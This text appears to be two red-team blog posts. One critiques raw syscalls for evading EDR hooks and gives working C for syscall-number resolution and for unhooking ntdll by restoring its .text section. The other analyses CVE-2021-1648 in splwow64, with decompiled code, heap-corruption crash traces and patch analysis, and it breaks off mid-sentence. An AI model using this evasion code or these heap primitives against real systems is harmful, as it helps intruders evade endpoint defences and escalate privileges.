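    "SysNtReadVirtualMemory:\n"
    "    movq %rcx, %r10\n"
    "    movl $0x3f, %eax\n"
    "    syscall\n"
    "    ret\n");

/* C-side declaration matching NtReadVirtualMemory's prototype. */
long SysNtReadVirtualMemory(void *ProcessHandle, void *BaseAddress,
                            void *Buffer,
                            unsigned long long NumberOfBytesToRead,
                            unsigned long long *NumberOfBytesReaded);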

Modern EDRs will typically inject hooks, or detours, into the implementation of the function. This allows them to capture additional information about the context of the call for further analysis. In some cases the call can be outright blocked. As a red team, we obviously want to stymie this.

With that, I want to detail a few shortcomings with this technique that I’ve seen in many of the public implementations. Let me once again stress here that I’m not trying to denigrate these tools; they provide utility and have their use cases that cannot be ignored, which I hope to highlight below.

syscall values are not consistent

j00ru maintains the go-to source for both nt and win32k, and by blindly searching around on here you can see the shift in values between functions. Windows 10 alone currently has eleven columns for the different major builds of Win10, some functions shifting 4 or 5 times. This means that we either need to know ahead of time what build the victim is running and tailor the syscall stubs specifically (at worst cumbersome in a post-exp environment), or we need to dynamically generate the syscall number at runtime.

There are several proposed solutions to discovering the syscall at runtime: sorting Zw exports, reading the stubs directly out of the mapped NTDLL, querying j00ru’s Github repository (lol), or actually baking every potential code into the payload and selecting the correct one at runtime. These are all usable options, but everything here is either cumbersome or an unnecessary risk that raises our threat profile with the EDR’s ML model.
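
As an example of the first option, the classic trick is to rank the Zw* exports of the mapped NTDLL by address: the stubs are laid out in ascending syscall-number order, so a stub’s syscall number equals the count of Zw* stubs at lower addresses. A sketch (assuming that layout property holds, as it does on the builds I’m aware of):

#include <windows.h>
#include <string.h>

DWORD GetSyscallNumber(const char *zw_name) {
  BYTE *base = (BYTE *)GetModuleHandleA("ntdll.dll");
  IMAGE_NT_HEADERS *nt =
      (IMAGE_NT_HEADERS *)(base + ((IMAGE_DOS_HEADER *)base)->e_lfanew);
  IMAGE_EXPORT_DIRECTORY *exp = (IMAGE_EXPORT_DIRECTORY *)(base +
      nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
          .VirtualAddress);
  DWORD *names = (DWORD *)(base + exp->AddressOfNames);
  DWORD *funcs = (DWORD *)(base + exp->AddressOfFunctions);
  WORD  *ords  = (WORD *)(base + exp->AddressOfNameOrdinals);

  /* Find the RVA of the requested Zw* stub. */
  DWORD target_rva = 0;
  for (DWORD i = 0; i < exp->NumberOfNames; i++)
    if (!strcmp((const char *)(base + names[i]), zw_name))
      target_rva = funcs[ords[i]];
  if (!target_rva) return (DWORD)-1;

  /* The syscall number is the number of Zw* stubs below ours. */
  DWORD rank = 0;
  for (DWORD i = 0; i < exp->NumberOfNames; i++) {
    const char *name = (const char *)(base + names[i]);
    if (name[0] == 'Z' && name[1] == 'w' && funcs[ords[i]] < target_rva)
      rank++;
  }
  return rank;
}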

Let’s say you attempt to read NTDLL off disk to discover the stubs; that requires issuing CreateFile and ReadFile calls, both triggering minifilter and ETW events, and potentially executing already established EDR hooks. Maybe that raises your threat profile a few percentage points, but you’re still golden. You then need to copy that stub out into an executable section, set up the stack/registers, and invoke. Optionally, you could use the already mapped NTDLL; that requires either GetProcAddress, walking the PEB, or parsing out the IAT. Are these events surrounding the resolution of the stub more or less likely to increase the threat profile than just calling the NTDLL function itself?

The least-bad option of these is baking the codes into your payload and switching at runtime based on the detected system version. In memory this is going to look like an s-box switch, but there are no extraneous reads of on-disk or in-memory modules and no stumbling up and down the PEB. This is great, but cumbersome if you need to support a range of languages and execution environments, particularly those with on-demand or dynamic requirements.
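
A rough sketch of that s-box approach follows. The build numbers are real Windows 10 builds, but the syscall values are illustrative placeholders to be filled from j00ru’s table; the PEB offsets are the commonly documented x64 values:

#include <windows.h>
#include <intrin.h>

// Sketch of the "bake it in" approach: a table of syscall numbers keyed by
// OS build, selected once at runtime. The syscall values are placeholders.
typedef struct { WORD build; DWORD ssn; } SyscallRow;

static const SyscallRow g_NtReadVirtualMemory[] = {
    { 17763, 0x3F }, // Win10 1809 (placeholder value)
    { 19041, 0x3F }, // Win10 2004 (placeholder value)
};

DWORD SelectSyscallNumber(void)
{
    // OSBuildNumber lives at PEB+0x120 on x64; gs:[0x60] holds the PEB.
    BYTE *peb = (BYTE *)__readgsqword(0x60);
    WORD build = *(WORD *)(peb + 0x120);

    for (size_t i = 0; i < ARRAYSIZE(g_NtReadVirtualMemory); i++)
        if (g_NtReadVirtualMemory[i].build == build)
            return g_NtReadVirtualMemory[i].ssn;

    return (DWORD)-1; // unknown build: bail rather than guess
}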

syscalls miss useful/critical functionality

In addition to ease of use in C/C++, user mode APIs provide additional functionality prior to hitting the kernel. This could be setting up/formatting arguments, exception or edge-case handling, SxS/activation contexts, etc. Without using these APIs and instead syscalling yourself, you’re missing out on this, for better or for worse. In some cases it means porting that behavior directly to your assembler stub or setting up the environment pre/post execution.

In some cases, like WriteProcessMemory or CreateRemoteThreadEx, it’s more “helpful” than actually necessary. In others, like CreateEnclave or CallEnclave, it’s virtually a requirement. If you’re angling to use only a specific set of functions (NtReadVirtualMemory/NtWriteVirtualMemory/etc) this might not be much of an issue, but expanding beyond that comes with great caveats.

the spooky functions are probably being called anyway

In general, syscalling is used to evade the use of some function known or suspected to be hooked in user mode. In certain scenarios we can guarantee that the syscall is the only way that hooked function is going to execute. In others, however, such as a more feature rich stage 0 or C2, we can’t guarantee this. Consider the following (pseudo-code):

UseSysCall(NtOpenProcess, ...)
UseSysCall(NtAllocateVirtualMemory, ...)
UseSysCall(NtWriteVirtualMemory, ...)
UseSysCall(NtCreateThreadEx, ...)

In the above we’ve opened a writable process handle, created a blob of memory, written into it, and started a thread to execute it. A very common process injection strategy. Setting aside the tsunami of information this feeds into the kernel, only dynamic instrumentation of the runtime would detect something like this. Any IAT or inline hooks are evaded.

But say your loader does a few other things, makes a few other calls to user32, dnsapi, kernel32, etc. Do you know that those functions don’t make calls into the very functions you’re attempting to avoid using? Now you could argue that by evading the hooks for more sensitive functionality (process injection), you’ve lowered your threat score with the EDR. This isn’t entirely true though because EDR isn’t blind to your remote thread (PsSetCreateThreadNotifyRoutine) or your writable process handle (ObRegisterCallbacks) or even your cross process memory write. So what you’ve really done is avoided sending contextualized telemetry to the kernel of the cross process injection — is that enough to avoid heightened scrutiny? Maybe.

Additionally, modern EDRs hook a ton of stuff (or at least some do). Most syscall projects and research focus on NTDLL; what about kernel32, user32, advapi32, wininet, etc? None of the syscall evasion is going to work here because, naturally, a majority of those don’t need to syscall into the kernel (or do via other ntdll functions…). For evasion coverage, then, you may need to both bolt on raw syscall support as well as a generic unhooking strategy for the other modules.
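
As an illustration of the latter, here’s a bare-bones sketch of one common generic unhooking approach: map a clean copy of the module from disk with SEC_IMAGE and restore its .text section over the loaded image. Error handling and edge cases (e.g. hooks living outside .text) are glossed over:

#include <windows.h>
#include <string.h>

// Map a clean copy of a module from disk and copy its .text section over
// the (potentially hooked) loaded image. SEC_IMAGE lays the file out the
// same way the loader would, so section RVAs line up.
BOOL UnhookModule(LPCWSTR diskPath, LPCWSTR moduleName)
{
    BYTE *mod = (BYTE *)GetModuleHandleW(moduleName);
    if (!mod)
        return FALSE;

    HANDLE file = CreateFileW(diskPath, GENERIC_READ, FILE_SHARE_READ,
                              NULL, OPEN_EXISTING, 0, NULL);
    if (file == INVALID_HANDLE_VALUE)
        return FALSE;

    HANDLE map = CreateFileMappingW(file, NULL, PAGE_READONLY | SEC_IMAGE,
                                    0, 0, NULL);
    BYTE *clean = map ? (BYTE *)MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0) : NULL;
    BOOL ok = FALSE;

    if (clean) {
        IMAGE_NT_HEADERS *nt =
            (IMAGE_NT_HEADERS *)(mod + ((IMAGE_DOS_HEADER *)mod)->e_lfanew);
        IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt);

        for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) {
            if (memcmp(sec->Name, ".text", 6) != 0)
                continue;

            DWORD old;
            VirtualProtect(mod + sec->VirtualAddress, sec->Misc.VirtualSize,
                           PAGE_EXECUTE_READWRITE, &old);
            memcpy(mod + sec->VirtualAddress, clean + sec->VirtualAddress,
                   sec->Misc.VirtualSize);
            VirtualProtect(mod + sec->VirtualAddress, sec->Misc.VirtualSize,
                           old, &old);
            ok = TRUE;
        }
        UnmapViewOfFile(clean);
    }

    if (map) CloseHandle(map);
    CloseHandle(file);
    return ok;
}

Note the irony: the clean mapping itself emits exactly the file I/O and memory protection telemetry discussed above, so this trades one set of observable events for another.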

syscalls are partially effective at escaping UM data sinks

Many user mode hooks themselves do not have proactive defense capabilities baked in. By and large they are used to gather telemetry on the call context to provide to the kernel driver or system service for additional analysis. This analysis, paired with what it’s gathered via ETW, kernel mode hooks, and other data sinks, forms a composite picture of the process since birth.

Let’s take the example of cross process code injection referenced above. Let’s also give your loader the benefit of the doubt and assume it’s triggered nothing and emitted little telemetry on its way to execution. When the following is run:

UseSysCall(NtOpenProcess, ...)
UseSysCall(NtAllocateVirtualMemory, ...)
UseSysCall(NtWriteVirtualMemory, ...)
UseSysCall(NtCreateThreadEx, ...)

We are firing off a ton of telemetry to the kernel and any listening drivers. Without a single user mode hook we would know:

  1. Process A opened a handle to Process B with X permissions (ObRegisterCallbacks)
  2. Process A allocated memory in Process B with X permissions (EtwTi)
  3. Process A wrote data into Process B VAS (EtwTi)
  4. Process A created a remote thread in Process B (PsSetCreateThreadNotifyRoutine, Etw)

It is true that EtwTi is newish and doesn’t capture everything, hence the partial effectiveness. But that argument grows thin over time as adoption of the feed grows and the API matures.

A strong argument for syscalls here is that they evade custom data sinks. Up until now we’ve only considered what Microsoft provides, not what the vendor themselves might include in their hook routine, and how that telemetry might influence their agent’s model. Some vendors, for performance reasons, prefer to extract thread information at call time. Some capture all parameters and pack them into more consumable binary blobs for consumption in the kernel. Depending on what exactly the hook does, and its criticality to the Bayesian model, this might be a great reason to use raw syscalls.

your testing isn’t comprehensive or indicative of the general case

This is a more general gripe with some of the conversation on modern EDR evasion. Modern EDRs use a variety of learning heuristics to determine if an unknown binary is malicious or not; sometimes successfully, sometimes not. This model is initially trained on some set of data (depending on the vendor), but continues to grow based on its observations of the environment and data shared amongst nodes. This is generally known as online learning. On large deployments of new EDRs there is typically a learning or passive phase; this allows the model to collect baseline metrics of what is normal and, hopefully, identify anomalies or deviations thereafter.

Effectively then, given a long enough timeline, one enterprise’s agent model might be significantly different from another. This has a few implications. The first being, of course, that your lab environment is not an accurate representation of the client. While your syscall stub might work fine in the lab, unless it’s particularly novel, it’s entirely possible it’s been observed elsewhere.

This also means that pinpointing the reason why your payload works or doesn’t work is a bit of a dark art. If your payload with the syscall evasion ends up working in a client environment, does that mean the evasion is successful, or would it have worked regardless of whether you used ntdll or not? If on the other hand your payload was blocked, can you identify the syscalls as the problem? Furthermore, if you add in evasion stubs and successfully execute, can you definitively point to the syscall evasion as the threat score culprit?

At this point, then, it’s a game of risk. You risk allowing the agent’s model to continue aggregating telemetry and improving its heuristics, and thereby the entire network’s model. Repeated testing taints the analysis chain as it grows to identify portions of your code as malicious or not; a fuzzy match, regardless of the function or assembler changes made. You also risk exposing the increased telemetry and details to the cloud, which is then in the hands of both automated and manual tooling and analysis. And if you disable that telemetry, you no longer have an accurate representation of the product’s detection capabilities.

In short, much of the testing we do against these new EDR solutions is rather unscientific. That’s largely a result of our inability to both peer into the state of an agent’s model while also deterministically assessing its capabilities. Testing in a limped state (i.e. offline, with cloud connectivity blackholed, etc.) and restarting VMs after every test provides some basic insight, but we lose a significant chunk of EDR capability. Isolation is difficult.

anyway

These things, taken together, motivate my reluctance to embrace the strategy in much of my tooling. I’ve found scant cases in which a raw syscall was preferable to some other technique, and I’ve grown weary of the dubious veracity of some tooling claims. The EDRs today are not the EDRs of our red teaming forefathers; testing is complicated, telemetry insight is improving, and data sets and enterprise security budgets are growing. We’ve got to get better at quantifying and substantiating our tool testing/analysis, and we need to improve the conversation surrounding the technologies.

I have a few brief, unsolicited thoughts for both red teams and EDR vendors based on my years of experience in this space. I’d love to hear others.

for EDR

Do not rely on user mode hooks and, more importantly, do not implicitly trust them. Seriously. Even if you’re monitoring hook integrity from the kernel, there are too many variables and too many opportunities for malicious code to tamper with or otherwise corrupt the hook or the integrity of the incoming data. Consider this from a performance perspective if you need to. I know you think you’re being cute by:

  1. Monitoring your hot patches for modification
  2. Encrypting telemetry
  3. Transmitting telemetry via clandestine/obscure methods (I see you NtQuerySystemInformation)
  4. “Validating” client processes

The fact is anything emitted from an unsigned, untrusted, user mode process can be corrupted. Put your efforts into consuming ETW and registering callbacks on all important routines, PPL’ing your user mode services, and locking down your IPC and general communication channels. Consume AMSI if you must, with the same caveat as user mode hooks: it is a data sink, and not necessarily one of truth.

The more you can consume in the kernel (maybe a trustlet some day?), the more difficult you are to tamper with. There is of course the ability for red team to wormhole into the kernel and attack your driver, but this is another hurdle for an attacker to leap, and yet another opportunity to catch them.

for red team

Using raw syscalls is but a small component of a greater system — evasion is less a set of techniques and more a system of behaviors. Consider that the hooks themselves are not the problem, but rather what the hooks do. I had to edit myself several times here to not reference the spoon quote from the Matrix, but it’s apt, if cliche.

There are also more effective methods of evading user mode hooks than raw syscalling. I’ve discussed some of them publicly in the past, but urge you to investigate the machinations of the EDR hooks themselves. I’d argue even IAT/inline unhooking is more effective, in some cases.

Cloud capabilities are the truly scary expansion. Sample submission, cloud telemetry aggregation and analysis, and manual/automatic hunting services change the landscape of threat analysis. Not only can your telemetry be correlated or bolstered amongst nodes, it can be retroactively hunted and analyzed. This retroactive capability, often provided by backend automation or threat hunting teams (hi Overwatch!), can be quite effective at improving an enterprise’s agent model. And not only one enterprise’s model; consider the fact that these data points are shared amongst all vendor subscribers and used to subsequently improve those agent models. Burning a technique is no longer isolated to a technology or a client.

On Exploiting CVE-2021-1648 (splwow64 LPE)

10 March 2021 at 21:10

In this post we’ll examine the exploitability of CVE-2021-1648, a privilege escalation bug in splwow64. I actually started writing this post to organize my notes on the bug and subsystem, and was initially skeptical of its exploitability. I went back and forth on the notion, ultimately ditching the bug. Regardless, organizing notes and writing blogs can be a valuable exercise! The vector is useful, seems to have a lot of attack surface, and will likely crop up again unless Microsoft performs a serious exorcism on the entire spooler architecture.

This bug was first detailed by Google Project Zero (GP0) on December 23, 2020[0]. While it’s unclear from the original GP0 description if the bug was discovered in the wild, k0shl later detailed that it was his bug reported to MSRC in July 2020[1] and only just patched in January of 2021[2]. Seems, then, that it was a case of bug collision. The bug is a usermode crash in the splwow64 process, caused by a wild memcpy in one of the LPC endpoints. This could lead to a privilege escalation from a low IL to medium.

This particular vector has a sordid history that’s probably worth briefly detailing. In short, splwow64 is used to host 64-bit usermode printer drivers and implements an LPC endpoint, thus allowing 32-bit processes access to 64-bit printer drivers. This vector was popularized by Kaspersky in their great analysis of Operation Powerfall, an APT they detailed in August of 2020[3]. As part of the chain they analyzed CVE-2020-0986, effectively the same bug as CVE-2021-1648, as noted by GP0. In turn, CVE-2020-0986 is essentially the same bug as another found in the wild, CVE-2019-0880[4]. Each time Microsoft failed to adequately patch the bug, leading to a new variant: first there were no pointer checks, then it was guarded by driver cookies, then offsets. We’ll look at how they finally chose to patch the bug later on.

I won’t regurgitate how the LPC interface works; for that, I recommend reading Kaspersky’s Operation Powerfall post[3] as well as the blog by ByteRaptor[4]. Both of these cover the architecture of the vector well enough to understand what’s happening. Instead, we’ll focus on what’s changed since CVE-2020-0986.

To catch you up very briefly, though: splwow64 exposes an LPC endpoint that any process can connect to and send requests. These requests carry opcodes and input parameters to a variety of printer functions (OpenPrinter, ClosePrinter, etc.). These functions occasionally require pointers as input, and thus the input buffer needs to support those.

As alluded to, Microsoft chose to use offsets in the LPC request buffers instead of raw pointers. Since the input/output addresses were to be used in memcpy’s, they need to be translated back from offsets to absolute addresses. The functions UMPDStringPointerFromOffset, UMPDPointerFromOffset, and UMPDOffsetFromPointer were added to accommodate this need. Here’s UMPDPointerFromOffset:

__int64 UMPDPointerFromOffset(unsigned __int64 *lpOffset, __int64 lpBufStart, unsigned int dwSize)
{
  unsigned int64 Offset;

  if ( lpOffset && lpBufStart )
  {
    Offset = *lpOffset;
    if ( !*lpOffset )
      return 1;
    if ( Offset <= 0x7FFFFFFF && Offset + dwSize <= 0x7FFFFFFF )
    {
      *lpOffset = Offset + lpBufStart;
      return 1;
    }
  }
  return 0;
}

So as per the GP0 post, the buffer addresses are indeed restricted to <=0x7fffffff. Implicit in this is also the fact that our offset is unsigned, meaning we can only work with positive numbers; therefore, if our target address is somewhere below our lpBufStart, we’re out of luck.

This new offset strategy kills the previous techniques used to exploit this vulnerability. Under CVE-2020-0986, they exploited the memcpy by targeting a global function pointer. When request 0x6A is called, a function (bLoadSpooler) is used to resolve a dozen or so winspool functions used for interfacing with printers.

These global variables are “protected” by RtlEncodePointer, as detailed by Kaspersky[3], but this is relatively trivial to break when executing locally. Using the memcpy with arbitrary src/dst addresses, they were able to overwrite the function pointers and replace one with a call to LoadLibrary.

Unfortunately, now that offsets are used, we can no longer target any arbitrary address. Not only are we restricted to 32-bit addresses, but we are also restricted to addresses >= the message buffer and <= 0x7fffffff.

I had a few thoughts/strategies here. My first attempt was to target UMPD cookies. This was part of a mitigation added after 0986 as again described by Kaspersky. Essentially, in order to invoke the other functions available to splwow64, we need to open a handle to a target printer. Doing this, GDI creates a cookie for us and stores it in an internal linked list. The cookie is created by LoadUserModePrinterDriverEx and is of type UMPD:

typedef struct _UMPD {
    DWORD               dwSignature;        // data structure signature
    struct _UMPD *      pNext;             // linked list pointer
    PDRIVER_INFO_2W     pDriverInfo2;       // pointer to driver info
    HINSTANCE           hInst;              // instance handle to user-mode printer driver module
    DWORD               dwFlags;            // misc. flags
    BOOL                bArtificialIncrement; // indicates if the ref cnt has been bumped up to
    DWORD               dwDriverVersion;    // version number of the loaded driver
    INT                 iRefCount;          // reference count
    struct ProxyPort *  pp;                 // UMPD proxy server
    KERNEL_PVOID        umpdCookie;         // cookie returned back from proxy
    PHPRINTERLIST       pHandleList;        // list of hPrinter's opened on the proxy server
    PFN                 apfn[INDEX_LAST];   // driver function table
} UMPD, *PUMPD;

When a request for a printer action comes in, GDI will check that the request contains a valid printer handle and that a cookie exists for it. Conveniently, there’s a function pointer table at the end of the UMPD structure called by a number of LPC functions. By using the pointer to the head of the cookie list, a global variable, we can inspect the list:

0:006> dq poi(g_ulLastUmpdCookie-8)
00000000`00bce1e0  00000000`fedcba98 00000000`00000000
00000000`00bce1f0  00000000`00bcdee0 00007ffb`64dd0000
00000000`00bce200  00000000`00000001 00000001`00000000
00000000`00bce210  00000000`00000000 00000000`00000001
00000000`00bce220  00000000`00bc8440 00007ffb`64dd2550
00000000`00bce230  00007ffb`64dd2d20 00007ffb`64dd2ac0
00000000`00bce240  00007ffb`64dd2de0 00007ffb`64dd30f0
00000000`00bce250  00000000`00000000
0:006> dps poi(g_ulLastUmpdCookie-8)+(8*9) l5
00000000`00bce228  00007ffb`64dd2550 mxdwdrv!DrvEnablePDEV
00000000`00bce230  00007ffb`64dd2d20 mxdwdrv!DrvCompletePDEV
00000000`00bce238  00007ffb`64dd2ac0 mxdwdrv!DrvDisablePDEV
00000000`00bce240  00007ffb`64dd2de0 mxdwdrv!DrvEnableSurface
00000000`00bce248  00007ffb`64dd30f0 mxdwdrv!DrvDisableSurface

This is the first UMPD cookie entry, and we can see its function table contains 5 entries. Conveniently all of these heap addresses are 32-bit.

Unfortunately, none of these functions are called from splwow64 LPC. When processing the LPC requests, the following check is performed on the received buffer:

(MType = lpMsgBuf[1], MType >= 0x6A) && (MType <= 0x6B || MType - 109 <= 7)

This effectively limits the functions we can call to 0x6a through 0x74, and the only times the function tables are referenced are prior to 0x6a.

Another strategy I looked at was abusing the fact that request buffers are allocated from the same heap, and thus linear. Essentially, I wanted to see if I could TOCTTOU the buffer by overwriting the memcpy destination after it’s transformed from an offset to an address, but before it’s processed. Since the splwow64 process is disposable and we can crash it as often as we’d like without impacting system stability, it seems possible. After tinkering with heap allocations for a while, I discovered a helpful primitive.

When a request comes into the LPC server, splwow64 will first allocate a buffer and then copy the request into it:

MessageSize = 0;
if ( *(_WORD *)ProxyMsg == 0x20 && *((_QWORD *)this + 9) )
{
  MessageSize = *((_DWORD *)ProxyMsg + 10);
  if ( MessageSize - 16 > 0x7FFFFFEF )
    goto LABEL_66;
  lpMsgBuf = (unsigned int *)operator new[](MessageSize);
}

...

if ( lpMsgBuf )
{
  rMessageSize = MessageSize;
  memcpy_s(lpMsgBuf, MessageSize, *((const void *const *)ProxyMsg + 6), MessageSize);
  ...
}

Notice there are effectively no checks on the message size; this gives us the ability to allocate chunks of arbitrary size. What’s more is that once the request has finished processing, the output is copied back to the memory view and the buffer is released. Since the Windows heap aggressively returns free chunks of same sized requests, we can obtain reliable read/write into another message buffer. Here’s the leaked heap address after several runs:

PortView 1008 heap: 0x0000000000DD9E90
PortView 1020 heap: 0x0000000002B43FE0
PortView 1036 heap: 0x0000000000DD9E90
PortView 1048 heap: 0x0000000002B43FE0
PortView 1060 heap: 0x0000000000DD9E90
PortView 1072 heap: 0x0000000002B43FE0
PortView 1084 heap: 0x0000000000DD9E90
PortView 1096 heap: 0x0000000002B43FE0
PortView 1108 heap: 0x0000000000DD9E90
PortView 1120 heap: 0x0000000002B43FE0
PortView 1132 heap: 0x0000000000DD9E90
PortView 1144 heap: 0x0000000002B43FE0
PortView 1156 heap: 0x0000000000DD9E90
PortView 1168 heap: 0x0000000002B43FE0
PortView 1180 heap: 0x0000000000DD9E90
PortView 1192 heap: 0x0000000002B43FE0
PortView 1204 heap: 0x0000000000DD9E90
PortView 1216 heap: 0x0000000002B43FE0
PortView 1228 heap: 0x0000000000DD9E90
PortView 1240 heap: 0x0000000002B43FE0

Since we can only write to addresses ahead of ours, we can use 0xdd9e90 to write into 0x2b43fe0 (offset of 0x1d6a150). Note that these allocations are coming out of the front-end allocator due to their size, but as previously mentioned, we’ve got a lot of control there.
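
The recycling behavior itself is easy to demonstrate in isolation. The following standalone sketch has nothing to do with splwow64, and exact reuse depends on heap state and whether the LFH has kicked in for the bucket, but it shows why same-sized allocations land predictably:

#include <windows.h>
#include <stdio.h>

// Free then reallocate the same size: the heap will frequently hand back
// the same chunk, which is what makes the message buffer reuse predictable.
int main(void)
{
    HANDLE heap = GetProcessHeap();
    void *a = HeapAlloc(heap, 0, 0x300);
    HeapFree(heap, 0, a);
    void *b = HeapAlloc(heap, 0, 0x300);
    printf("a=%p b=%p%s\n", a, b, a == b ? " (recycled)" : "");
    return 0;
}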

After a few hours and a lot of threads, I abandoned this approach as I was unable to trigger an appropriately timed overwrite. I found a memory leak in the port connection code, but it’s tiny (0x18 bytes) and doesn’t improve the odds, no matter how much pressure I put on the heap. I next attempted to target the message type field; maybe the connection timing was easier to land. Recall that splwow64 restricts the message type we can request. This is because certain message types are considered “privileged”. How privileged, you ask? Well, let’s see what 0x76 does:

case 0x76u:
  v3 = *(_QWORD *)(lpMsgBuf + 32);
  if ( v3 )
  {
    memcpy_0(*(void **)(lpMsgBuf + 32), *(const void **)(lpMsgBuf + 24), *(unsigned int *)(lpMsgBuf + 40));
    *a2 = v3;
  }

A fully controlled memcpy with zero checks on the values passed. If we could gain access to this we could use the old techniques used to exploit this vulnerability.

After rigging up some threads to spray, I quickly identified a crash:

(1b4.1a9c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!RtlpAllocateHeap+0x833:
00007ff9`ab669e83 4d8b4a08        mov     r9,qword ptr [r10+8] ds:00000076`00000008=????????????????
0:006> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ff9`ab6673d4     : 00000000`01500000 00000000`00800003 00000000`00002000 00000000`00002010 : ntdll!RtlpAllocateHeap+0x833
01 00007ff9`ab6b76e7     : 00000000`00000000 00000000`012a0180 00000000`00000000 00000000`00000000 : ntdll!RtlpAllocateHeapInternal+0x6d4
02 00007ff9`ab6b75f9     : 00000000`01500000 00000000`00000000 00000000`012a0180 00000000`00000080 : ntdll!RtlpAllocateUserBlockFromHeap+0x63
03 00007ff9`ab667eda     : 00000000`00000000 00000000`00000310 00000000`000f0000 00000000`00000001 : ntdll!RtlpAllocateUserBlock+0x111
04 00007ff9`ab666e2c     : 00000000`012a0000 00000000`00000000 00000000`00000300 00000000`00000000 : ntdll!RtlpLowFragHeapAllocFromContext+0x88a
05 00007ff9`a9f39d40     : 00000000`00000000 00000000`00000300 00000000`00000000 00007ff9`a9f70000 : ntdll!RtlpAllocateHeapInternal+0x12c
06 00007ff6`faeac57f     : 00000000`00000300 00000000`00000000 00000000`01509fd0 00000000`00000000 : msvcrt!malloc+0x70
07 00007ff6`faea7c76     : 00000000`00000300 00000000`01509fd0 00000000`015018e0 00000000`00000000 : splwow64!operator new+0x23
08 00007ff6`faea8ada     : 00000000`00000000 00000000`01501678 00000000`0150e340 00000000`0150e4f0 : splwow64!TLPCMgr::ProcessRequest+0x9e

That’s the format of our spray, but you’ll notice it’s crashing during allocation. Basically, the message buffer chunk was freed and we’ve managed to overwrite the freelist chunk’s forward link prior to it being reused. Once our next request comes in, it attempts to allocate a chunk out of this sized bucket and crashes walking the list.

Notably, we can also corrupt a busy chunk’s header, leading to a crash during the free process:

0:006> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ffe`1d5b7e42     : 00000000`00000000 00007ffe`1d6187f0 00000000`00000003 00000000`014d0000 : ntdll!RtlReportCriticalFailure+0x56
01 00007ffe`1d5b812a     : 00000000`00000003 00000000`02d7f440 00000000`014d0000 00000000`014d9fc8 : ntdll!RtlpHeapHandleError+0x12
02 00007ffe`1d5bdd61     : 00000000`00000000 00000000`014d0150 00000000`00000000 00000000`014d9fd0 : ntdll!RtlpHpHeapHandleError+0x7a
03 00007ffe`1d555869     : 00000000`014d9fc0 00000000`00000055 00000000`00000000 00007ffe`00000027 : ntdll!RtlpLogHeapFailure+0x45
04 00007ffe`1d4c0df1     : 00000000`014d02e8 00000000`00000055 00000000`00000001 00000000`00000055 : ntdll!RtlpHeapFindListLookupEntry+0x94029
05 00007ffe`1d4c480b     : 00000000`014d0000 00000000`014d9fc0 00000000`014d9fc0 00000000`00000080 : ntdll!RtlpFindEntry+0x4d
06 00007ffe`1d4c95c4     : 00000000`014d0000 00000000`014d0000 00000000`014d9fc0 00000000`014d0000 : ntdll!RtlpFreeHeap+0x3bbcd
07 00007ffe`1d4c5d21     : 00000000`00000000 00000000`014d0000 00000000`00000000 00000000`00000000 : ntdll!RtlpFreeHeapInternal+0x464
08 00007ffe`1cdf9c9c     : 00000000`030c1490 00000000`014d9fd0 00000000`014d9fd0 00000000`00000000 : ntdll!RtlFreeHeap+0x51
09 00007ff7`28b8805d     : 00000000`030c1490 00000000`014d9fd0 00000000`00000000 00000000`00000000 : msvcrt!free+0x1c
0a 00007ff7`28b88ada     : 00000000`00000000 00000000`00000000 00000000`030c0cd0 00000000`030c0d00 : splwow64!TLPCMgr::ProcessRequest+0x485

This is an interesting primitive because it grants us full control over a heap chunk, both free and busy, but unlike the browser world, full of its class objects and vtables, our message buffer is flat, already assumed to be untrustworthy. This means we can’t just overwrite a function pointer or modify an object length. Furthermore, the lifespan of the object is quite short. Once the message has been processed and the response copied back to the shared memory region, the chunk is released.

I spent quite a bit of time digging into public work on NT/LF heap exploitation primitives in modern Windows 10, but came up empty. Most work these days focuses on browser heaps and, typically, abusing object fields to gain code execution or AAR/AAW. @scwuaptx[7] has a great paper on modern heap internals/primitives[6] and an example from a CTF in ‘19[5], but ends up using a FILE object to gain r/w which is unavailable here.

While I wasn’t able to take this to full code execution, I’m fairly confident this is doable provided the right heap primitive comes along. I was able to gain full control over a free and busy chunk with valid headers (leaking the heap encoding cookie), but Microsoft has killed all the public techniques, and I don’t have the motivation to find new ones (for now ;P).

The code is available on Github[8], which is based on the public PoC. It uses my technique described above to leak the heap cookie and smash a free chunk’s flink.

Patch

Microsoft patched this in January, just a few weeks after Project Zero FD’d the bug. They added a variety of things to the function, but the crux of the patch is that a buffer size is now required and used as a bounds check before performing memcpy’s.

GdiPrinterThunk now checks if DisableUmpdBufferSizeCheck is set in HKLM\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize. If it is, GdiPrinterThunk_Unpatched is used; otherwise, GdiPrinterThunk_Patched. I can only surmise that they didn’t want to break compatibility with…something, and decided to implement a hack while they work on a more complete solution (AppContainer..?). The new GdiPrinterThunk:

int GdiPrinterThunk(int MsgBuf, int MsgBufSize, int MsgOut, unsigned int MsgOutSize)
{
  int result;

  if ( gbIsUmpdBufferSizeCheckEnabled )
    result = GdiPrinterThunk_Patched(MsgBuf, MsgBufSize, (__int64 *)MsgOut, MsgOutSize);
  else
    result = GdiPrinterThunk_Unpatched(MsgBuf, (__int64 *)rval, rval);
  return result;
}

Along with the buf size they now also require the return buffer size and check to ensure it’s sufficiently large to hold output (this is supplied by the ProxyMsg in splwow64).

And the specific patch for the 0x6d memcpy:

SrcPtr = **MsgBuf_Off80;
if ( SrcPtr )
{
  SizeHigh = SrcPtr[34];
  DstPtr = *(void **)(MsgBuf + 88);
  dwCopySize = SizeHigh + SrcPtr[35];
  if ( DstPtr + dwCopySize <= _BufEnd        // ensure we don't write past the end of the MsgBuf
    && (unsigned int)dwCopySize >= SizeHigh  // ensure total is at least >= SizeHigh
    && (unsigned int)dwCopySize <= 0x1FFFE ) // sanity check WORD boundary
  {
    memcpy_0(DstPtr, SrcPtr, dwCopySize);
  }
}

It’s a little funny at first and seems like an incomplete patch, but it’s because Microsoft has removed (or rather, inlined) all of the previous UMPDPointerFromOffset calls. It still exists, but it’s only called from within UMPDStringPointerFromOffset_Patched and now named UMPDPointerFromOffset_Patched. Here’s how they’ve replaced the source offset conversion/check:

